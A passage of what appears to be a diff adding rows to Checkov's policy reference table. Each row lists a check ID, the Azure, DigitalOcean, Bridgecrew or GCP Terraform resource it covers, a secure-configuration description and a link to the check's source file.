[VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1520 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1521 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1522 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1523 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1524 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1525 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | 
[VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1526 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1527 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1528 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1529 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1530 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | 
[AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 1531 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 1532 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | +| 1533 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1534 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1535 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1536 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are 
utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | +| 1537 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 1538 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 1539 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | +| 1540 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | +| 1541 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 1542 | CKV2_AZURE_13 | resource | 
azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 1543 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 1544 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 1545 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | +| 1546 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 1547 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 1548 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform 
| [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 1549 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 1550 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | +| 1551 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1552 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1553 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1554 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for 
Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1555 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1556 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1557 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 1558 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 1559 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | +| 1560 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation 
account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | +| 1561 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | +| 1562 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | +| 1563 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | +| 1564 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | +| 1565 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | +| 1566 | CKV2_AZURE_30 | resource | 
azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | +| 1567 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | +| 1568 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | +| 1569 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | +| 1570 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | +| 1571 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | +| 1572 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed 
identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | +| 1573 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | +| 1574 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | +| 1575 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1576 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1577 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1578 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial 
console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1579 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | +| 1580 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | +| 1581 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | +| 1582 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | +| 1583 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | +| 1584 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | 
[AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | +| 1585 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 1586 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 1587 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | +| 1588 | CKV2_AZURE_48 | resource | azurerm_databricks_workspace | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Terraform | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) | +| 1589 | CKV2_AZURE_49 | resource | azurerm_machine_learning_workspace | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | Terraform | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml) | +| 1590 | CKV2_AZURE_50 
| resource | azurerm_machine_learning_workspace | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) |
+| 1591 | CKV2_AZURE_50 | resource | azurerm_storage_account | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) |
+| 1592 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) |
+| 1593 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) |
+| 1594 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) |
+| 1595 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) |
+| 1596 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) |
+| 1597 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) |
+| 1598 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) |
+| 1599 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) |
+| 1600 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) |
+| 1601 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) |
+| 1602 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) |
+| 1603 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) |
+| 1604 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) |
+| 1605 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) |
+| 1606 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) |
+| 1607 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) |
+| 1608 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) |
+| 1609 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) |
+| 1610 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) |
+| 1611 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) |
+| 1612 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) |
+| 1613 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) |
